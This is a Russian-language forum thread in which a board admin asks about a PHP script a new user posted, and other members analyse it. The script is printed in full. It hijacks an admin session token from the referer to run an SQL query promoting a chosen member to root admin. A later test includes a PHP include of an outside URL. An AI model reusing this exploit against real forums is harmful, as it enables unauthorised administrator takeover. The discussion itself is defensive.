Перейти к контенту
  • 0

Скрипт


Вопрос

Приветствую.

Захожу я сегодня к себе на форум и вижу пост от новенького пользователя (ник естественно просто набор букв) со скриптом. Ясно дело, что он пытался не мод новый испробовать. Часть его я понял, но не могли бы вы подробнее рассказать, что именно этот юзер хотел и почему у него, вроде как, ничего не вышло?

 

Скрипт:

<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql& code=runsql&query=UPDATE+{$prefix}members+SET+
mgroup%3D4+where+id%3D{$mid}+LIMIT+1");
}
?>

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0

Пользователю, зарегистрированному под номером 145 присвоить статус админа.

 

Я так понимаю, что скрипт не сработал. Если бы сработал, был бы не виден этот текст в топике; зато были бы последствия.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

А разве есть подобные дыры?( Это же пхп код, его так просто не исполнишь ведь...

 

P.S. 2 FatCat: А wiki-team больше нету?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
FatCat, это я и так понял. Меня больше интересует то, что сказал Саннис. Такие дыры вообще есть? Если есть, то в каком именно файле?
Ссылка на комментарий
Поделиться на других сайтах

  • 0
А разве есть подобные дыры?( Это же пхп код, его так просто не исполнишь ведь...

До перехода на ИПБ пользовали какой-то самописный движок, там такие штуки срабатывали.

Если я правильно понимаю архитектонику ИПБ, там в принципе не будет работать пхп-код из БД.

 

Думаю, что тут "трудился" дилетант-хакер, не понимающий в принципе, сколь защищенную машину собрался взломать.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
FatCat, то есть, другими словами, волноваться на почве этого скрипта не стоит, ибо он не представляет никакой угрозы?
Ссылка на комментарий
Поделиться на других сайтах

  • 0

Это реальная дырка.

Но есть одно существенное ограничение: IP адрес нападающего должен совпадать с IP адресом записи в admin_sessions.

Это почти невозможная ситуация.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Song, можно поподробнее?) А то я не могу понять, где в админцентре есть что-то связанное с постами... Ну разве что сам админ его через SQL-утилиту запросит.
Ссылка на комментарий
Поделиться на других сайтах

  • 0
Это реальная дырка.

Но есть одно существенное ограничение: IP адрес нападающего должен совпадать с IP адресом записи в admin_sessions.

Решил проверить.

Вошел админом. Сессия, очевидно, админская?

Чтобы не маяться с юникодами, запостил "бла-бла-бла", и затем через phpAdmin перезаписал текст в ibf_posts на код:

<?php
include "http://03.ru";
?>

Зарефрешил топик - ничего не отображается. Но в сорцах страницы находится:

<td width='100%' valign='top' class='post2'>
	<!-- THE POST 14363 -->
	<div class='postcolor'><?php
include "http://03.ru";
?> </div>

	<!-- THE POST -->
  </td>

Как видишь, код не отработан, а передан втупую браузеру.

 

Где уязвимость?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
А чего по-твоему должно отобразиться?

Контент главной страницы 03.ru

 

Если добавить код не в БД форума, а на простую пхп-шную страницу, контент главной 03 отлично инклайдится и отображается на странице. А в форуме фиг; в том числе и из-под админской сессии.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Ничё не понял.

Причём тут инклуд если мы говорим про скрипт в 1-ом посте?

С чего ты взял, что его нужно инклудом куда-то вставлять?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Ничё не понял.

Причём тут инклуд если мы говорим про скрипт в 1-ом посте?

Я говорил о том, что пхп-код из БД не выполняется сервером, а отдается браузеру в виде текста.

Подтвердил это экспериментом с инклайдом. ИМХО, этот эксперимент нагляднее: заглянув в сорцы полученой страницы я убедился, что код отдан браузеру неинтерпретированыым текстом.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Ну правильно. И что?

 

Никто и не говорил, что для выполнения этого скрипта его нужно написать в пост :D

 

Да и тем более adess'а при просмотре топика нет.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Никто и не говорил, что для выполнения этого скрипта его нужно написать в пост :D

Хочешь сказать, что хакеру нужно положить файл на сервер, а потом под админской сессией его запустить?

 

Если у хакера будет возможность аплоада, он и без админской сессии может немало дров наломать.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Я ничего не хочу сказать.

Не хватало чтобы ещё я на паблике рассказывал такие технологии.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Song

Погуглил, понял свою ошибку.

Я-то все под 1.3 примерял, в ней нет не то что этой дырки, нет того места, в котором дырка. :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Song, оказывается ты знаешь о каких-то уязвимостях для "закрытого круга"? уууу.....

 

ты так с врагами расправляешься?))

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.